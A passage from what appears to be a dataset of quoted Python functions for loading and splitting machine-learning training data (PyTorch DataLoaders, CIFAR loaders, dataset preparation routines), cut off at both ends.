trng_dataloader, 
valn_dataloader", "def build_training_data_loader(self) -> DataLoader:\n pass", "def _prepare_data(self):\n #TODO hardcoded values need to change\n print_info(\"Preprocessing the train data...\")\n self._place_dataset(os.path.join(self._hparams[\"temp-data\"], \"train\"),\n self.TRAIN_OUT_PATH)\n\n print_info(\"Preprocessing the test data...\")\n self._place_dataset(os.path.join(self._hparams[\"temp-data\"], \"test\"),\n self.TEST_OUT_PATH)\n\n print_info(\"Preprocessing the validation data...\")\n self._place_dataset(os.path.join(self._hparams[\"temp-data\"], \"val\"),\n self.VAL_OUT_PATH)", "def prepare_dataloader(opt, dataobj):\n\n def load_data(name):\n with open(name, 'rb') as f:\n data = pickle.load(f)\n num_types = 1 # There is no event type prediction, hence using a dummy value, this will basically be a constant value field\n return data, num_types\n\n print('[Info] Loading train data...')\n train_data, num_types = load_data(opt.data + 'train_ny.pkl')\n print('[Info] Loading dev data...')\n val_data, _ = load_data(opt.data + 'val_ny.pkl')\n print('[Info] Loading test data...')\n test_data, _ = load_data(opt.data + 'test_ny.pkl')\n\n trainloader = get_dataloader(train_data, opt.batch_size, shuffle=True)\n validationloader = get_dataloader(val_data, opt.batch_size, shuffle=True)\n testloader = get_dataloader(test_data, opt.batch_size, shuffle=False)\n return trainloader, validationloader, testloader, num_types", "def get_data_loaders(args, tokenizer):\n personachat = get_dataset(tokenizer, args.dataset_path, args.dataset_cache, args.train_lang)\n _ = personachat.pop(\"test\", None)\n logger.info(\"Build inputs and labels\")\n datasets = {\"train\": [], \"valid\": []}\n\n if args.train_lang in [\"En\", \"Fr\", \"It\", \"Id\", \"Jp\", \"Ko\", \"Zh\"]: #monolingual data\n for dataset_name, dataset in personachat.items():\n for dial in dataset[args.train_lang]: #dial: {\"persona\":[], \"history\":[], \"response\":str}\n instance = build_input_from_segments(dial[\"persona\"], dial[\"history\"][-args.max_turns:], dial[\"response\"], tokenizer, lm_labels = True)\n datasets[dataset_name].append(instance) \n else: #multilingual data\n for dataset_name, dataset in personachat.items():\n for lang, dials in dataset.items():\n for dial in dials: #dial: {\"persona\":[], \"history\":[], \"response\":str}\n instance = build_input_from_segments(dial[\"persona\"], dial[\"history\"][-args.max_turns:], dial[\"response\"], tokenizer, lang_id=\"<{}>\".format(lang.lower()), lm_labels = True)\n datasets[dataset_name].append(instance) #all langs together\n\n\n logger.info(\"Build train and validation dataloaders\")\n train_dataset = DatasetTrain(datasets[\"train\"])\n valid_dataset = DatasetTrain(datasets[\"valid\"])\n\n #logger.info(\"Build train and validation dataloaders\")\n #train_dataset, valid_dataset = TensorDataset(*tensor_datasets[\"train\"]), TensorDataset(*tensor_datasets[\"valid\"])\n train_sampler = torch.utils.data.distributed.DistributedSampler(train_dataset) if args.distributed else None\n valid_sampler = torch.utils.data.distributed.DistributedSampler(valid_dataset) if args.distributed else None\n train_loader = DataLoader(train_dataset, sampler=train_sampler, batch_size=args.train_batch_size, shuffle=(not args.distributed), collate_fn=collate_fn)\n valid_loader = DataLoader(valid_dataset, sampler=valid_sampler, batch_size=args.valid_batch_size, shuffle=False, collate_fn=collate_fn)\n\n # logger.info(\"Train dataset (Batch, Candidates, Seq length): 
{}\".format(train_dataset.tensors[0].shape))\n # #logger.info(\"Train dataset (Batch, Candidates, Seq length): {}\".format(train_dataset.tensors[1].shape))\n # logger.info(\"Valid dataset (Batch, Candidates, Seq length): {}\".format(valid_dataset.tensors[0].shape))\n logger.info(\"Train dataset length: {}\".format(len(train_dataset)))\n logger.info(\"Valid dataset length: {}\".format(len(valid_dataset)))\n return train_loader, valid_loader, train_sampler, valid_sampler", "def data_creator(config):\n train_dataset, val_dataset = LinearDataset(2, 5), LinearDataset(2, 5)\n train_loader = DataLoader(train_dataset, batch_size=config[\"batch_size\"])\n val_loader = DataLoader(val_dataset, batch_size=config[\"batch_size\"])\n return train_loader, val_loader", "def prepare_data():\n gennet.prepare_data('Resnet50')", "def prepare_data(self):\n data = self._get_dataset(self.hparams.dataset_path)\n label_encoder = data[\"label_encoder\"]\n del data[\"label_encoder\"]\n\n click.secho(\"Building inputs and labels.\", fg=\"yellow\")\n datasets = {\n \"train\": defaultdict(list),\n \"valid\": defaultdict(list),\n \"test\": defaultdict(list),\n }\n for dataset_name, dataset in data.items():\n for sample in dataset:\n instance = self.build_input(\n self.tokenizer, sample[\"text\"], label_encoder, sample[\"label\"]\n )\n for input_name, input_array in instance.items():\n datasets[dataset_name][input_name].append(input_array)\n\n click.secho(\"Padding inputs and building tensors.\", fg=\"yellow\")\n tensor_datasets = {\"train\": [], \"valid\": [], \"test\": []}\n for dataset_name, dataset in datasets.items():\n dataset = self.pad_dataset(dataset, padding=self.tokenizer.pad_index)\n for input_name in MODEL_INPUTS:\n if input_name == \"labels\":\n tensor = torch.tensor(dataset[input_name], dtype=torch.float32)\n else:\n tensor = torch.tensor(dataset[input_name])\n tensor_datasets[dataset_name].append(tensor)\n\n self.train_dataset = TensorDataset(*tensor_datasets[\"train\"])\n self.valid_dataset = TensorDataset(*tensor_datasets[\"valid\"])\n self.test_dataset = TensorDataset(*tensor_datasets[\"test\"])\n click.secho(\n \"Train dataset (Batch, Candidates, Seq length): {}\".format(\n self.train_dataset.tensors[0].shape\n ),\n fg=\"yellow\",\n )\n click.secho(\n \"Valid dataset (Batch, Candidates, Seq length): {}\".format(\n self.valid_dataset.tensors[0].shape\n ),\n fg=\"yellow\",\n )\n click.secho(\n \"Test dataset (Batch, Candidates, Seq length): {}\".format(\n self.test_dataset.tensors[0].shape\n ),\n fg=\"yellow\",\n )", "def init_loaders(self, *args, **kwargs):\n\n # Convert the data to Dataset\n dataset_dict = self.init_datasets(*args, **kwargs)\n\n # If the Dataset implements collate_fn, that is used. 
Otherwise, default_collate is used\n if hasattr(dataset_dict[\"train\"], \"collate_fn\") and callable(\n getattr(dataset_dict[\"train\"], \"collate_fn\")\n ):\n collate_fn = dataset_dict[\"train\"].collate_fn\n else:\n collate_fn = default_collate\n\n # If 'iters_per_epoch' is defined, then a fixed number of random sample batches from the training set\n # are drawn per epoch.\n # Otherwise, an epoch is defined by a full run through all of the data in the dataloader.\n #\n if self.config_dict.get(\"iters_per_epoch\") is not None:\n num_samples = (\n self.config_dict[\"iters_per_epoch\"] * self.config_dict[\"batch_size\"]\n )\n loaders_dict = {}\n for key in dataset_dict.keys():\n if key == \"train\":\n loaders_dict[key] = DataLoader(\n dataset_dict[key],\n batch_sampler=BatchSampler(\n RandomSampler(\n dataset_dict[key],\n replacement=True,\n num_samples=num_samples,\n ),\n batch_size=self.config_dict[\"batch_size\"],\n drop_last=False,\n ),\n collate_fn=collate_fn,\n )\n else:\n loaders_dict[key] = DataLoader(\n dataset_dict[key],\n batch_size=self.config_dict[\"batch_size\"],\n collate_fn=collate_fn,\n )\n else:\n loaders_dict = {\n key: DataLoader(\n dataset_dict[key],\n batch_size=self.config_dict[\"batch_size\"],\n collate_fn=collate_fn,\n )\n for key in data_dict.keys()\n }\n\n return loaders_dict", "def prepare(self):\n if self.opts['verbose']:\n print(\"Preparing dataset (one-time operation)...\")\n # Create paths files and load them back in\n self._build_ID_sets()\n self._create_ID_files()\n self._load_ID_files()\n if self.opts['verbose']:\n print(\"... done with preparing the dataset.\")", "def prep_data():\n loader = DLoader()\n cap = loader.visitor_cnt\n\n pass", "def dataloader(self):\n\n # load / split data\n train_data = self.data.get_train_data()\n if self.args.use_dev:\n train_data, dev_data = self.data.split_data(train_data)\n test_data = self.data.get_test_data()\n\n #print(train_data[0])\n #print(dev_data[0])\n #print(test_data[0])\n\n # build dataset\n train_dataset = self.loader.build_dataset(\n train_data, \n self.args.train_max_seq_len)\n train_loader = self.loader.build_dataloader(\n train_dataset, 'train')\n\n test_dataset = self.loader.build_dataset(\n test_data,\n self.args.eval_max_seq_len)\n test_loader = self.loader.build_dataloader(\n test_dataset, 'test')\n\n if self.args.use_dev:\n dev_dataset = self.loader.build_dataset(\n dev_data,\n self.args.eval_max_seq_len)\n dev_loader = self.loader.build_dataloader(\n dev_dataset, 'dev')\n return train_loader, dev_loader, test_loader\n else:\n return train_loader, test_loader", "def preload_all(self):\n for tp in self.tps:\n for f in self.featurefiles + self.maskfiles:\n file = os.path.join(tp, f)\n print('preloading {}'.format(file))\n self.load(file, lazy=False)", "def get_loader(config):\n train_transform = [T.Resize((256, 128)), T.RandomHorizontalFlip(), T.ToTensor(),\n T.Normalize(mean=[0.5, 0.5, 0.5], std=[0.5, 0.5, 0.5])]\n train_transform = T.Compose(train_transform)\n\n test_transform = [T.Resize((256, 128)), T.ToTensor(),\n T.Normalize(mean=[0.5, 0.5, 0.5], std=[0.5, 0.5, 0.5])]\n test_transform = T.Compose(test_transform)\n\n # Datasets.\n if config.source_dataset in ['duke'] and config.target_dataset in ['market']:\n source_image_dir = config.duke_image_dir\n target_image_dir = config.market_image_dir\n elif config.source_dataset in ['market'] and config.target_dataset in ['duke']:\n source_image_dir = config.market_image_dir\n target_image_dir = config.duke_image_dir\n else:\n assert 'Dataset not 
support!'\n source_set = ReidDataset(source_image_dir, train_transform)\n target_set = ReidDataset(target_image_dir, train_transform, config.expanding_cam)\n test_set = ReidDataset(source_image_dir, test_transform)\n\n # Dataloader.\n source_loader = data.DataLoader(dataset=source_set, batch_size=config.batch_size,\n num_workers=config.num_workers, shuffle=True, pin_memory=True, drop_last=True)\n\n target_loader = data.DataLoader(dataset=target_set, batch_size=config.batch_size,\n num_workers=config.num_workers, shuffle=True, pin_memory=True, drop_last=True)\n\n test_loader = data.DataLoader(dataset=test_set, batch_size=config.batch_size, num_workers=config.num_workers,\n shuffle=False, pin_memory=True, drop_last=False)\n\n return {'source_loader': source_loader, 'target_loader': target_loader, 'test_loader': test_loader}", "def creates_data_loader():\n dataset_faces = FaceDataset(\n IMG_DIR, transform=transform_train, face=True)\n\n dataset_no_faces = FaceDataset(\n IMG_DIR, transform=transform_train, face=False)\n\n datasets_faces_split = train_val_test(dataset_faces, 0.2, 0.0)\n datasets_no_faces_split = train_val_test(dataset_no_faces, 0.2, 0.0)\n\n datasets = {}\n datasets[\"train\"] = datasets_faces_split[\"train\"] + \\\n datasets_no_faces_split[\"train\"]\n datasets[\"test\"] = datasets_no_faces_split[\"test\"]\n datasets[\"val\"] = datasets_faces_split[\"val\"] + \\\n datasets_no_faces_split[\"val\"]\n\n train_loader = DataLoader(dataset=datasets[\"train\"], batch_size=BATCH_SIZE,\n num_workers=NUM_WORKERS, pin_memory=PIN_MEMORY, shuffle=True, drop_last=False)\n\n val_loader = DataLoader(dataset=datasets[\"val\"], batch_size=BATCH_SIZE,\n num_workers=NUM_WORKERS, pin_memory=PIN_MEMORY, shuffle=True, drop_last=False)\n return train_loader, val_loader", "def create_loader(self):\n # load data to memory.\n if self.is_cifar100:\n (x_train, y_train), (x_test,\n y_test) = tf.keras.datasets.cifar100.load_data()\n else:\n (x_train, y_train), (x_test,\n y_test) = tf.keras.datasets.cifar10.load_data()\n\n y_train = y_train.astype(np.int32)\n y_test = y_test.astype(np.int32)\n\n x_train, y_train = shuffle_dataset(x_train, y_train)\n n_probe = int(math.floor(x_train.shape[0] * FLAGS.probe_dataset_hold_ratio))\n\n # TODO(zizhaoz): add other noise types.\n if 'asymmetric' in self.dataset_name:\n assert 'cifar100' not in self.dataset_name, 'Asymmetric only has CIFAR10'\n (x_train, y_train, y_gold), (x_probe, y_probe) = load_asymmetric(\n x_train,\n y_train,\n noise_ratio=self.noise_ratio,\n n_val=n_probe,\n random_seed=FLAGS.seed)\n elif 'uniform' in self.dataset_name:\n (x_train, y_train, y_gold), (x_probe,\n y_probe) = load_train_val_uniform_noise(\n x_train,\n y_train,\n n_classes=self.num_classes,\n noise_ratio=self.noise_ratio,\n n_val=n_probe)\n else:\n assert self.dataset_name in ['cifar10', 'cifar100']\n\n if not self.split_probe and x_probe is not None:\n # Usually used for supervised comparison.\n tf.logging.info('Merge train and probe')\n x_train = np.concatenate([x_train, x_probe], axis=0)\n y_train = np.concatenate([y_train, y_probe], axis=0)\n y_gold = np.concatenate([y_gold, y_probe], axis=0)\n\n conf_mat = sklearn_metrics.confusion_matrix(y_gold, y_train)\n conf_mat = conf_mat / np.sum(conf_mat, axis=1, keepdims=True)\n tf.logging.info('Corrupted confusion matirx\\n {}'.format(conf_mat))\n x_test, y_test = shuffle_dataset(x_test, y_test)\n self.train_dataset_size = x_train.shape[0]\n self.val_dataset_size = x_test.shape[0]\n if self.split_probe:\n self.probe_size = 
x_probe.shape[0]\n\n input_tuple = (x_train, y_train.squeeze())\n self.train_dataflow = self.create_ds(input_tuple, is_train=True)\n self.val_dataflow = self.create_ds((x_test, y_test.squeeze()),\n is_train=False)\n if self.split_probe:\n self.probe_dataflow = self.create_ds((x_probe, y_probe.squeeze()),\n is_train=True)\n\n tf.logging.info('Init [{}] dataset loader'.format(self.dataset_name))\n verbose_data('train', x_train, y_train)\n verbose_data('test', x_test, y_test)\n if self.split_probe:\n verbose_data('probe', x_probe, y_probe)\n\n return self", "def _preload_all_samples(self):\n if self.mode in ['train_noval', 'train_with_val']:\n\n self._images_train, self._labels_train = [], []\n desc = \"Loading train image pairs & flows\"\n with tqdm(total=len(self._img_trn_path), desc=desc, ascii=True, ncols=100) as pbar:\n for n, image_path in enumerate(self._img_trn_path):\n pbar.update(1)\n label_path = self._lbl_trn_path[n]\n image, label = self._load_sample(image_path, label_path)\n self._labels_train.append(label)\n self._images_train.append(image)\n\n if self.mode == 'train_with_val':\n self._images_val, self._labels_val = [], []\n desc = \"Loading val image pairs & flows\"\n with tqdm(total=len(self._img_val_path), desc=desc, ascii=True, ncols=100) as pbar:\n for n, image_path in enumerate(self._img_val_path):\n pbar.update(1)\n label_path = self._lbl_val_path[n]\n image, label = self._load_sample(image_path, label_path, preprocess=False)\n self._labels_val.append(label)\n self._images_val.append(image)\n\n if self.opts['tb_test_imgs'] is True:\n self._images_test = []\n desc = \"Loading test samples\"\n with tqdm(total=len(self._img_tst_path), desc=desc, ascii=True, ncols=100) as pbar:\n for image_path in self._img_tst_path:\n pbar.update(1)\n self._images_test.append(self._load_sample(image_path, preprocess=False))\n\n elif self.mode in ['val', 'val_notrain']:\n\n self._images_val, self._labels_val = [], []\n desc = \"Loading val image pairs & flows\"\n with tqdm(total=len(self._img_val_path), desc=desc, ascii=True, ncols=100) as pbar:\n for n, image_path in enumerate(self._img_val_path):\n pbar.update(1)\n label_path = self._lbl_val_path[n]\n image, label = self._load_sample(image_path, label_path, preprocess=False)\n self._labels_val.append(label)\n self._images_val.append(image)\n\n elif self.mode == 'test':\n self._images_test = []\n desc = \"Loading test samples\"\n with tqdm(total=len(self._img_tst_path), desc=desc, ascii=True, ncols=100) as pbar:\n for image_path in self._img_tst_path:\n pbar.update(1)\n self._images_test.append(self._load_sample(image_path, preprocess=False))", "def init_trainers(self, args):\n self.actors_cur = [None for _ in range(self.num_agents)]\n self.critics_cur = [None for _ in range(self.num_agents)]\n self.actors_tar = [None for _ in range(self.num_agents)]\n self.critics_tar = [None for _ in range(self.num_agents)]\n self.optimizers_c = [None for _ in range(self.num_agents)]\n self.optimizers_a = [None for _ in range(self.num_agents)]\n input_size_global = sum(self.obs_shape_n) + sum(self.action_shape_n)\n\n if args.restore == True: # restore the model\n game_step = int(args.old_model_name.split('_')[-1][:-1])\n for idx in range(self.num_agents):\n self.actors_cur[idx] = torch.load(args.old_model_name+'a_c_{}.pt'.format(idx))\n self.actors_tar[idx] = torch.load(args.old_model_name+'a_t_{}.pt'.format(idx))\n self.critics_cur[idx] = torch.load(args.old_model_name+'c_c_{}.pt'.format(idx))\n self.critics_tar[idx] = 
torch.load(args.old_model_name+'c_t_{}.pt'.format(idx))\n self.optimizers_a[idx] = optim.Adam(self.actors_cur[idx].parameters(), args.lr_a)\n self.optimizers_c[idx] = optim.Adam(self.critics_cur[idx].parameters(), args.lr_c)\n self.var = self.var - (game_step-args.learning_start_episode*args.per_episode_max_len)*args.var_discount\n self.var = self.min_var if self.var < self.min_var else self.var\n old_data = {'game_step':game_step, 'episode_gone_old':int(game_step/args.per_episode_max_len)}\n\n # Note: if you need load old model, there should be a procedure for juding if the trainers[idx] is None\n for i in range(self.num_agents):\n self.actors_cur[i] = actor_agent(self.obs_shape_n[i], self.action_shape_n[i], \\\n args).to(args.device)\n self.critics_cur[i] = critic_agent(sum(self.obs_shape_n), sum(self.action_shape_n), \\\n args).to(args.device)\n self.actors_tar[i] = actor_agent(self.obs_shape_n[i], self.action_shape_n[i], \\\n args).to(args.device)\n self.critics_tar[i] = critic_agent(sum(self.obs_shape_n), sum(self.action_shape_n), \\\n args).to(args.device)\n self.optimizers_a[i] = optim.Adam(self.actors_cur[i].parameters(), args.lr_a)\n self.optimizers_c[i] = optim.Adam(self.critics_cur[i].parameters(), args.lr_c)\n\n # return the old data, no need to update the trainers\n if args.restore == True: return old_data\n\n self.actors_tar = self.update_trainers(self.actors_cur, self.actors_tar, 1.0) # update the target par using the cur\n self.critics_tar = self.update_trainers(self.critics_cur, self.critics_tar, 1.0) # update the target par using the cur", "def init_train(self):\n data = self.loader.load_labelled_data(self.conf.split, 'training')\n\n # Initialise unlabelled data iterator\n num_ul = 0\n if self.conf.ul_mix > 0:\n ul_data = self.loader.load_unlabelled_data(self.conf.split, 'all')\n\n # calculate number of unlabelled images as a proportion of the labelled images\n num_ul = int(data.size() * self.conf.ul_mix)\n num_ul = num_ul if num_ul <= ul_data.size() else ul_data.size()\n log.info('Sampling %d unlabelled images out of total %d.' % (num_ul, ul_data.size()))\n ul_data.sample(num_ul)\n self.gen_X_U = data_utils.generator(self.conf.batch_size, 'overflow', ul_data.images)\n\n # Initialise labelled data iterator\n assert self.conf.l_mix >= 0\n\n # calculate number of labelled images\n num_l = int(data.size() * self.conf.l_mix)\n num_l = num_l if num_l <= data.size() else data.size()\n log.info('Using %d labelled images out of total %d.' 
% (num_l, data.size()))\n train_images = data.images[:num_l]\n train_masks = data.masks[:num_l]\n\n self.conf.unlabelled_image_num = num_ul\n self.conf.labelled_image_num = num_l\n self.conf.data_len = num_ul if num_ul > num_l else num_l\n self.conf.batches = int(np.ceil(self.conf.data_len / self.conf.batch_size))\n self.conf.save()\n\n self.gen_X_L = data_utils.generator(self.conf.batch_size, 'overflow', train_images, train_masks)\n\n # Initialise real masks iterator for discriminator training, using the real masks from the data CV split.\n self.other_masks = data_utils.generator(self.conf.batch_size, 'overflow', data.masks + 0)", "def _init_al_dataset(self):\n\n self._init_dataset()\n\n train_dataset = self.datasets['train']\n\n dataset_size = len(train_dataset)\n self.budget = math.ceil(self.budget_frac*dataset_size)\n Sampler.__init__(self, config, self.budget) # TODO: Weird place to initialise this\n\n all_indices = set(np.arange(dataset_size))\n k_initial = math.ceil(len(all_indices)*self.initial_budget_frac)\n initial_indices = random.sample(list(all_indices), k=k_initial)\n\n sampler_init = data.sampler.SubsetRandomSampler(initial_indices) # need to sample from training dataset\n\n self.labelled_dataloader = data.DataLoader(train_dataset, sampler=sampler_init, batch_size=self.batch_size, drop_last=True)\n self.val_dataloader = data.DataLoader(self.datasets['valid'], batch_size=self.batch_size, drop_last=False)\n self.test_dataloader = data.DataLoader(self.datasets['test'], batch_size=self.batch_size, drop_last=False)\n\n return all_indices, initial_indices", "def __init__(self, file_paths_list, batch_size=1, patient_shape=(128, 128, 128), shuffle=True,\n mode_name='training_model', trans=[128]):\n # Set file_loader specific attributes\n self.rois = dict(oars=['Brainstem', 'SpinalCord', 'RightParotid', 'LeftParotid',\n 'Esophagus', 'Larynx', 'Mandible'], targets=['PTV56', 'PTV63', 'PTV70'])\n\n #self.batch_size = batch_size # Number of patients to load in a single batch\n self.patient_shape = patient_shape # Shape of the patient\n self.indices = np.arange(len(file_paths_list)) # Indices of file paths\n self.file_paths_list = file_paths_list # List of file paths\n self.shuffle = shuffle # Indicator as to whether or not data is shuffled\n self.full_roi_list = sum(map(list, self.rois.values()), []) # make a list of all rois\n self.num_rois = len(self.full_roi_list)\n self.patient_id_list = ['pt_{}'.format(k.split('/pt_')[1].split('/')[0].split('.csv')[0]) for k in\n self.file_paths_list] # the list of patient ids with information in this data loader\n self.trans = trans\n # Set files to be loaded\n self.required_files = None\n # self.aff_trans = MyRandomTransform()#transformation()\n self.mode_name = mode_name # Defines the mode for which data must be loaded for\n self.set_mode(self.mode_name) # Set load mode to prediction by default\n \n self.ct_scaling_factor = 4000. #Added by Ramsy\n self.dose_scaling_factor = 100. 
#Added by Ramsy", "def _generate_and_load_initial_batch(self, working_directory: Path):\n\n template_dir = Path(working_directory) / \"template_1\"\n template_dir.mkdir()\n # changes here should often be reflected in\n # data_generator_opts and data_loader_opts\n\n channel_decl = self.channel_configs[0]\n\n plugin_options = {\n \"pid\": \"0\",\n \"big_ids\": \"True\",\n }\n # if it's efficient to do the whole load in one go, let's just do that.\n if self.run_until.gap < MIN_PORTION_SIZE:\n num_records = self.run_until.gap\n else:\n num_records = 1 # smallest possible batch to get to parallelizing fast\n results = self._generate_and_load_batch(\n template_dir,\n channel_decl.org_config,\n {\n \"generator_yaml\": self.options.get(\"recipe\"),\n \"num_records\": num_records,\n \"num_records_tablename\": self.run_until.sobject_name or COUNT_REPS,\n \"loading_rules\": self.loading_rules,\n \"vars\": channel_decl.merge_recipe_options(self.recipe_options),\n \"plugin_options\": plugin_options,\n \"bulk_mode\": self.bulk_mode,\n },\n )\n self.update_running_totals_from_load_step_results(results)\n\n # rename directory to reflect real number of sets created.\n wd = SnowfakeryWorkingDirectory(template_dir)\n if self.run_until.sobject_name:\n self.sets_finished_while_generating_template = wd.get_record_counts()[\n self.run_until.sobject_name\n ]\n else:\n self.sets_finished_while_generating_template = num_records\n\n new_template_dir = data_loader_new_directory_name(template_dir, self.run_until)\n shutil.move(template_dir, new_template_dir)\n template_dir = new_template_dir\n\n # don't send data tables to child processes. All they\n # care about are ID->OID mappings\n wd = SnowfakeryWorkingDirectory(template_dir)\n self._cleanup_object_tables(*wd.setup_engine())\n\n return template_dir, wd.relevant_sobjects()", "def prepare_data_for_training(args):\n # Form the train/test splits and write them to disk\n dataset = data.Dataset(args)\n # get image classes and image counts in each class\n label_map = dataset.get_class_info()\n class_count = len(list(label_map.values()))\n # split the data and store it in log dir\n df_train, df_test = dataset.split_dataset()\n\n # perform dataset augmentations\n image_data = augment.Augmentation(args)\n # get the data gens for training and test images\n train_data_gen, _ = image_data.map_fn_train(df_train)\n test_data_gen, _ = image_data.map_fn_test(df_test)\n\n return train_data_gen, test_data_gen, df_train, df_test, class_count", "def make_dataloaders(params):\r\n transform_train = transforms.Compose([transforms.RandomCrop(32, padding=4),\r\n transforms.RandomHorizontalFlip(),\r\n transforms.ToTensor(),\r\n transforms.Normalize([0.4914, 0.4822, 0.4465], [0.2023, 0.1994, 0.2010])])\r\n\r\n transform_validation = transforms.Compose([transforms.ToTensor(),\r\n transforms.Normalize([0.4914, 0.4822, 0.4465],\r\n [0.2023, 0.1994, 0.2010])])\r\n\r\n transform_validation = transforms.Compose([transforms.ToTensor()])\r\n\r\n trainset = torchvision.datasets.CIFAR10(root=params['path'], train=True, transform=transform_train)\r\n testset = torchvision.datasets.CIFAR10(root=params['path'], train=False, transform=transform_validation)\r\n\r\n trainloader = torch.utils.data.DataLoader(trainset, batch_size=params['batch_size'], shuffle=True, num_workers=4)\r\n testloader = torch.utils.data.DataLoader(testset, batch_size=params['batch_size'], shuffle=False, num_workers=4)\r\n return trainloader, testloader", "def load_dataloaders(args):\n logger.info(\"Loading dataloaders...\")\n 
p_path = os.path.join(\"./data/\", \"df_unencoded.pkl\")\n train_path = os.path.join(\"./data/\", \"df_encoded.pkl\")\n if (not os.path.isfile(p_path)) and (not os.path.isfile(train_path)):\n df = get_data(args, load_extracted=False)\n elif os.path.isfile(p_path) and (not os.path.isfile(train_path)):\n df = get_data(args, load_extracted=True)\n elif os.path.isfile(train_path):\n df = load_pickle(\"df_encoded.pkl\")\n \n # Train-Test split\n msk = np.random.rand(len(df)) < args.train_test_ratio\n trainset = df[msk]\n testset = df[~msk]\n \n trainset = text_dataset(trainset, args)\n max_features_length = trainset.max_x_len\n max_seq_len = trainset.max_y_len\n train_length = len(trainset)\n train_loader = DataLoader(trainset, batch_size=args.batch_size, shuffle=True,\\\n num_workers=0, collate_fn=Pad_Sequence(), pin_memory=False)\n \n testset = text_dataset(testset, args)\n test_length = len(testset)\n test_loader = DataLoader(testset, batch_size=args.batch_size, shuffle=True,\\\n num_workers=0, collate_fn=Pad_Sequence(), pin_memory=False)\n return train_loader, train_length, max_features_length, max_seq_len, test_loader, test_length", "def get_data_loader(batch_size=10, num_workers=2):\n \n data_loader = torch.utils.data.DataLoader(dataset=TempuckeyDataSet(),\n batch_size=batch_size,\n shuffle=True,\n pin_memory=True,\n num_workers=num_workers,\n collate_fn=collate)\n return data_loader", "def create_split_loaders(root_dir, batch_size, seed=0, transform=transforms.ToTensor(),\n p_val=0.1, p_test=0.2, shuffle=True, \n show_sample=False, extras={}):\n \n\n # once all single json datasets are created you can concat them into a single one:\n quickdraw_dataset = CharacterDataset(root_dir=root_dir, transform=transform)\n \n # Dimensions and indices of training set\n dataset_size = len(quickdraw_dataset)\n all_indices = list(range(dataset_size))\n\n # Shuffle dataset before dividing into training & test sets\n if shuffle:\n np.random.seed(seed)\n np.random.shuffle(all_indices)\n \n # Create the validation split from the full dataset\n val_split = int(np.floor(p_val * dataset_size))\n train_ind, val_ind = all_indices[val_split :], all_indices[: val_split]\n \n # Separate a test split from the training dataset\n test_split = int(np.floor(p_test * len(train_ind)))\n train_ind, test_ind = train_ind[test_split :], train_ind[: test_split]\n print(len(train_ind), len(val_ind), len(test_ind))\n # Use the SubsetRandomSampler as the iterator for each subset\n sample_train = SubsetRandomSampler(train_ind)\n sample_test = SubsetRandomSampler(test_ind)\n sample_val = SubsetRandomSampler(val_ind)\n\n num_workers = 0\n pin_memory = False\n # If CUDA is available\n if extras:\n num_workers = extras[\"num_workers\"]\n pin_memory = extras[\"pin_memory\"]\n \n # Define the training, test, & validation DataLoaders\n train_loader = DataLoader(quickdraw_dataset, batch_size=batch_size, \n sampler=sample_train, num_workers=num_workers, \n pin_memory=pin_memory)\n\n test_loader = DataLoader(quickdraw_dataset, batch_size=batch_size, \n sampler=sample_test, num_workers=num_workers, \n pin_memory=pin_memory)\n\n val_loader = DataLoader(quickdraw_dataset, batch_size=batch_size,\n sampler=sample_val, num_workers=num_workers, \n pin_memory=pin_memory)\n\n \n # Return the training, validation, test DataLoader objects\n return (train_loader, val_loader, test_loader)", "def _load_data(self):\n self.mapper = Mapper()\n self.mapper.generate_vocabulary(self.review_summary_file)\n self.X_fwd, self.X_bwd, self.Y = 
self.mapper.get_tensor(reverseflag=True)\n # Store all the mapper values in a dict for later recovery\n self.mapper_dict = dict()\n self.mapper_dict['seq_length'] = self.mapper.get_seq_length()\n self.mapper_dict['vocab_size'] = self.mapper.get_vocabulary_size()\n self.mapper_dict['rev_map'] = self.mapper.get_reverse_map()\n # Split into test and train data\n self._split_train_tst()", "def __init__(self, \n fname_templates,\n fname_spike_train,\n reader,\n fname_out,\n dtype_out):\n #self.logger = logging.getLogger(__name__)\n\n # keep templates and spike train filname\n # will be loaded during each prallel process\n self.fname_templates = fname_templates\n self.fname_spike_train = fname_spike_train\n\n self.reader = reader\n\n # save output name and dtype\n self.fname_out = fname_out\n self.dtype_out = dtype_out", "def prepare_data(self):\n try:\n self.train_dataset = self.datasets['train']\n self.val_dataset = self.datasets['val']\n try:\n self.test_dataset = self.datasets['test']\n except:\n pass\n except Exception as e:\n print('Data was not succesfully prepared:', e)", "def initialise_dataset_loader(\n self, data_param=None, task_param=None, data_partitioner=None):\n raise NotImplementedError", "def get_dataloaders(args):\n if args.dataset == 'heat':\n dataset_class = heat.HeatDiffusionDataset\n else:\n raise ValueError(f'Unknown dataset {args.dataset}')\n train_dataset = dataset_class(\n dataset_class.get_train_path(args.data_path), args, train=True)\n if args.dist:\n train_sampler = torch.utils.data.distributed.DistributedSampler(\n train_dataset)\n else:\n train_sampler = torch.utils.data.RandomSampler(train_dataset)\n train_loader = torch.utils.data.DataLoader(\n train_dataset, batch_size=args.batch_size, num_workers=args.workers,\n sampler=train_sampler, pin_memory=True, drop_last=args.drop_last)\n if not args.no_eval:\n validation_dataset = dataset_class(\n dataset_class.get_validation_path(args.data_path), args, train=False)\n if args.dist:\n validation_sampler = torch.utils.data.distributed.DistributedSampler(\n validation_dataset, shuffle=False)\n else:\n validation_sampler = torch.utils.data.SequentialSampler(\n validation_dataset)\n validation_loader = torch.utils.data.DataLoader(\n validation_dataset, batch_size=args.batch_size,\n num_workers=args.workers, sampler=validation_sampler,\n pin_memory=True, drop_last=args.drop_last)\n\n test_dataset = dataset_class(\n dataset_class.get_test_path(args.data_path), args, train=False)\n if args.dist:\n test_sampler = torch.utils.data.distributed.DistributedSampler(\n test_dataset, shuffle=False)\n else:\n test_sampler = torch.utils.data.SequentialSampler(\n test_dataset)\n test_loader = torch.utils.data.DataLoader(\n test_dataset, batch_size=args.batch_size,\n num_workers=args.workers, sampler=test_sampler,\n pin_memory=True, drop_last=args.drop_last)\n else:\n validation_loader = None\n test_loader = None\n\n # Update the data shape if needed.\n if args.data_shape is None:\n args.data_shape = train_dataset.get_shape()\n if args.data_target_shape is None:\n args.data_target_shape = train_dataset.get_target_shape()\n\n return train_loader, validation_loader, test_loader", "def dataio_prepare(hparams):\n data_folder = hparams[\"data_folder\"]\n\n train_data = dataset.DynamicItemDataset.from_csv(\n csv_path=hparams[\"train_data\"],\n replacements={\"data_root\": data_folder}, )\n\n if hparams[\"sorting\"] == \"ascending\":\n # we sort training data to speed up training and get better results.\n train_data = 
